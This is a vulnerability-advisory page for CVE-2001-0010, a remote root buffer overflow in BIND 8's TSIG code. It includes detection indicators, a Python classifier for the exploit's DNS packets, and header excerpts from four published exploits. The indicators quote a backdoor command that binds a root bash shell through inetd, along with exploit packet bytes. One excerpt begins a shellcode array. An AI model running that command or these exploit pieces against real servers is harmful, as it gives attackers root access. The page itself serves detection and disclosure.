CVE-2001-0010
Published 2001-02-12
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
Priority P3 54 · critical 10 (CVSS 2.0) · AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit available
EPSS: 31.62% (98.1th percentile)
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| isc | bind | — | — |
| isc | bind | — | — |
| isc | bind | — | — |
Detection & IOCs (extracted from sources)
- command: `/bin/echo 'ingreslock stream tcp nowait root /bin/bash bash -i' > /tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf`
- bytes: `ab cd 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61`
- bytes: `00 fa ff` (TSIG type 0xfa, class ANY 0xff in DNS additional record)
- bytes: `00 00 fa ff` (TSIG AR terminator sequence in exploit packets)
- Detect DNS UDP infoleak probe packets: short (~23 byte) UDP DNS packets with the specific byte sequence AB CD 09 80 sent to port 53, used by exploits to leak the named process stack pointer before the overflow.
- Detect DNS query packets with DNS ID 0xDEAD containing a TSIG additional record (type 0xFA) — second stage of the exploit delivering the overflow payload.
- Detect a TCP connection to port 53 immediately followed by UDP DNS packets to the same target — the exploit establishes a TCP shell-back channel on port 53 while sending the overflow via UDP.
- Detect DNS NAME fields in query records that contain x86 shellcode patterns (e.g., JMP/CALL sequences, int 0x80 syscall bytes 0xcd 0x80) embedded within label segments — shellcode is smuggled inside DNS NAME fields.
- Note: the xtract_offset() values (argevdisp1 = 0x080d7cd0, argevdisp2 from offset 0x264 of infoleak response) are hardcoded for a specific BIND compilation and will differ across builds.
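A defender-side classifier for the byte patterns listed above, added here as an example and not taken from any of the page's sources: it inspects one UDP payload sent to port 53 and tags it as the infoleak probe (AB CD 09 80 prefix on a short packet) or as a DNS message carrying a TSIG record (type 0xFA, class ANY 0xFF), additionally flagging the DNS ID 0xDEAD. The 32-byte probe size threshold and the two non-probe sample messages are constructed assumptions.

```python
import struct

# Byte patterns quoted on this page; PROBE_MAX_LEN is an assumed threshold.
INFOLEAK_PREFIX = bytes.fromhex("abcd0980")  # start of the ~23-byte probe
PROBE_MAX_LEN = 32
TSIG_TYPE, CLASS_ANY = 0xFA, 0xFF
EXPLOIT_DNS_ID = 0xDEAD


def _skip_name(pkt, off):
    """Return the offset just past a DNS NAME (labels or a compression pointer)."""
    while True:
        if off >= len(pkt):
            raise ValueError("truncated name")
        length = pkt[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:  # two-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def classify_dns(pkt):
    """Classify one UDP payload to port 53; returns a list of alert tags."""
    alerts = []
    if len(pkt) < 12:  # shorter than a DNS header: nothing to parse
        return alerts
    if len(pkt) <= PROBE_MAX_LEN and pkt.startswith(INFOLEAK_PREFIX):
        alerts.append("infoleak-probe")
    dns_id, _flags, qd, an, ns, ar = struct.unpack("!6H", pkt[:12])
    off = 12
    try:
        for _ in range(qd):  # QNAME followed by QTYPE and QCLASS
            off = _skip_name(pkt, off) + 4
        for _ in range(an + ns + ar):  # walk every resource record
            off = _skip_name(pkt, off)
            rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10 + rdlen
            if rtype == TSIG_TYPE and rclass == CLASS_ANY:
                alerts.append("tsig-any-record")
                if dns_id == EXPLOIT_DNS_ID:
                    alerts.append("tsig-exploit-id")
    except (ValueError, struct.error):
        alerts.append("malformed-dns")  # truncated names or record lengths
    return alerts


# PROBE is the byte sequence quoted on this page; the other two are constructed.
PROBE = bytes.fromhex("abcd098000000001000000000000010001202020200261")
TSIG_QUERY = (struct.pack("!6H", EXPLOIT_DNS_ID, 0x0100, 1, 0, 0, 1)
              + b"\x01a\x00" + struct.pack("!HH", 1, 1)  # question: a. A IN
              + b"\x00" + struct.pack("!HHIH", TSIG_TYPE, CLASS_ANY, 0, 0))
BENIGN_QUERY = (struct.pack("!6H", 0x1234, 0x0100, 1, 0, 0, 0)
                + b"\x07example\x03com\x00" + struct.pack("!HH", 1, 1))

if __name__ == "__main__":
    for name, pkt in [("probe", PROBE), ("tsig", TSIG_QUERY), ("benign", BENIGN_QUERY)]:
        print(name, classify_dns(pkt))
```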
CVSS provenance
- nvd (v2.0): 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
- vendor_redhat: 10.0 CRITICAL
GHSA
GHSA-v5g5-g755-gf4v (ghsa_unreviewed · 2022-04-30 · HIGH): Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
Red Hat
security flaw (vendor_redhat · 2001-01-29 · CVSS 10.0 CRITICAL): Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
No detection rules found.
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4) (exploitdb · 2001-03-02)
---
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg
* Jonathan Wilkins
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [[email protected]] (the master of jmpz),
* lucysoft [[email protected]] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsible in any way for what you do with this code.
*
* flamez - canaris
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (1) (exploitdb · 2001-03-01)
---
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* [email protected]
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* tabstop set at 3
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
* This shellcode sux. cant ever get around to coding another one.
*/
char shellcode[] = {
0xeb,0x3b,0
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (2) (exploitdb · 2001-03-01)
---
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Slackware 4.0/RedHat 6.2 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleak" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned.
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (3) (exploitdb · 2001-03-01)
---
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Solaris 2.7 x86 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleak" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned. */
/* */
References
- http://www.cert.org/advisories/CA-2001-02.html
- http://www.debian.org/security/2001/dsa-026
- http://www.nai.com/research/covert/advisories/047.asp
- http://www.redhat.com/support/errata/RHSA-2001-007.html
- http://www.securityfocus.com/bid/2302